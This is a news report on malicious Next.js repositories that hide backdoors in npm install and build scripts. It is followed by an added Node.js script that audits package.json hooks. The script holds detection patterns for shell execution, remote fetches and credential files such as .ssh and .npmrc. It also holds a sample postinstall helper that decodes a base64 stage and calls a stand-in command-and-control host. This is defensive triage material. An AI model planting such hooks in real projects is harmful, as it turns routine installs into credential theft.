
Malicious Next.js repositories masquerading as open source tools are trapping developers and turning everyday npm commands into silent backdoors, exposing credentials and enterprise networks.
Attackers are seeding the open source ecosystem with malicious yet legitimate-looking Next.js repositories that embed staged backdoors inside build scripts and dependencies, according to Microsoft. Once cloned, routine commands such as npm install or npm run build quietly trigger command-and-control connections.
The campaign targets software developers who regularly clone public repositories to test coding challenges, assess recruitment tasks or collaborate on open-source tools. By exploiting default trust in shared code, the attackers turn standard development behaviour into the infection vector.
The technique abuses trusted workflows in Visual Studio Code and Node.js, hiding malicious logic inside package.json scripts, dependency chains and build processes rather than using conventional malware installers. Repositories are crafted to pass casual checks, complete with realistic commit histories, documentation and comments. Payloads are often obfuscated within ordinary JavaScript modules.
Impact extends beyond a single machine. Stolen credentials, session tokens and SSH keys can provide access to private repositories, corporate networks and cloud infrastructure, enabling lateral movement across organisations.
Microsoft said the activity reflects a broader shift towards supply-chain style intrusions that treat developers as privileged entry points. The framework itself is not vulnerable; instead, attackers manipulate normal workflows and trust in open-source collaboration.
Developers are advised to verify repository sources and recruiter identities, inspect package.json and install scripts, run unfamiliar code inside virtual machines or containers, enable multi-factor authentication, and rotate credentials regularly. The episode underscores a widening trust gap in open-source software consumption and the need for stricter code provenance and dependency checks.
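The article's advice to inspect package.json and install scripts can be partly mechanised. The following is an added example, not code from the article or from Microsoft: a small Node.js audit that lists the lifecycle hooks npm runs automatically during `npm install`, looks for crude textual indicators in each script line and in the local files the hook hands to `node`, and returns a triage verdict. The indicator list, the "take-home challenge" package.json and the helper module it points at are all constructed for illustration; the host name uses the reserved `.invalid` domain.

```javascript
// Added example (not the article's or Microsoft's code): audit an npm project's
// package.json plus the local files its hooks invoke. Everything below,
// including the sample project, is constructed for illustration.

// Hooks npm runs on its own during `npm install`, without an explicit `npm run`.
const AUTO_RUN_HOOKS = new Set([
  "preinstall", "install", "postinstall",
  "preprepare", "prepare", "postprepare", "prepublish",
]);

// Crude textual indicators that merit a second look in a hook or the file it runs.
const INDICATORS = [
  { name: "shell-exec", re: /\b(child_process|execSync|spawnSync|spawn|exec)\b/ },
  { name: "remote-fetch", re: /\b(curl|wget|https?:\/\/)/ },
  { name: "encoded-payload", re: /\b(base64|atob|fromCharCode)\b/ },
  { name: "inline-eval", re: /\b(eval|new Function|node\s+-e)\b/ },
  // Requires a path separator first so `process.env` does not trip it.
  { name: "credential-path", re: /[\/\\](\.ssh|\.npmrc|\.aws|\.git-credentials|\.env)\b/ },
];

// Names of the indicators whose pattern appears in `text`, in list order.
function scanSource(text) {
  return INDICATORS.filter((i) => i.re.test(text)).map((i) => i.name);
}

// Local .js/.mjs/.cjs files a script line hands to node, e.g. "node ./scripts/x.js".
function referencedFiles(cmd) {
  const out = [];
  const re = /\bnode\s+(?:\.\/)?([\w./-]+\.[cm]?js)\b/g;
  let m;
  while ((m = re.exec(cmd)) !== null) out.push(m[1]);
  return out;
}

// One finding per script entry that auto-runs on install and/or shows
// indicators in its own text or in the local files it executes.
// `files` maps repo-relative paths to file contents (read from disk in real use).
function auditProject(packageJsonText, files = {}) {
  const pkg = JSON.parse(packageJsonText);
  const findings = [];
  for (const [hook, cmd] of Object.entries(pkg.scripts || {})) {
    const indicators = new Set(scanSource(cmd));
    for (const path of referencedFiles(cmd)) {
      if (path in files) scanSource(files[path]).forEach((n) => indicators.add(n));
    }
    const autoRuns = AUTO_RUN_HOOKS.has(hook);
    if (autoRuns || indicators.size > 0) {
      findings.push({ hook, cmd, autoRuns, indicators: [...indicators] });
    }
  }
  return findings;
}

// Triage verdict: an auto-run hook with indicators is the combination the
// article describes (install runs code you never asked for).
function verdict(findings) {
  if (findings.some((f) => f.autoRuns && f.indicators.length > 0)) return "review-before-install";
  if (findings.some((f) => f.autoRuns)) return "auto-run-hooks-present";
  return "clean";
}

// Constructed sample: package.json looks ordinary, the postinstall hook defers
// the suspicious logic to a helper module where a casual reviewer may not look.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "nextjs-take-home-challenge",
  scripts: {
    dev: "next dev",
    build: "next build",
    lint: "next lint",
    postinstall: "node ./scripts/telemetry.js",
  },
});

const SAMPLE_FILES = {
  "scripts/telemetry.js": [
    "const { execSync } = require('child_process');",
    "const stage = Buffer.from(process.env.STAGE2 || '', 'base64').toString();",
    "require('https').get('https://c2.invalid/stage', () => {}); // inert placeholder host",
  ].join("\n"),
};

if (typeof require !== "undefined" && require.main === module) {
  const findings = auditProject(SAMPLE_PACKAGE_JSON, SAMPLE_FILES);
  console.log(verdict(findings));
  for (const f of findings) {
    console.log(`${f.hook}: ${f.cmd} [${f.indicators.join(", ")}]`);
  }
}

if (typeof module !== "undefined") {
  module.exports = { auditProject, scanSource, referencedFiles, verdict, SAMPLE_PACKAGE_JSON, SAMPLE_FILES };
}
```

On the sample, the verdict is `review-before-install`, because the only finding is the postinstall hook whose helper file contains shell execution, a remote fetch and a base64 decode. A textual check like this is a triage aid, not a guarantee: obfuscated modules can avoid every pattern, which is why the article's advice to run unfamiliar repositories inside a disposable VM or container still applies. The blunt companion control is to stop npm running hooks at all, with `npm install --ignore-scripts` for a one-off or `npm config set ignore-scripts true` for the whole workstation, and to re-enable them only for projects that have been reviewed.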
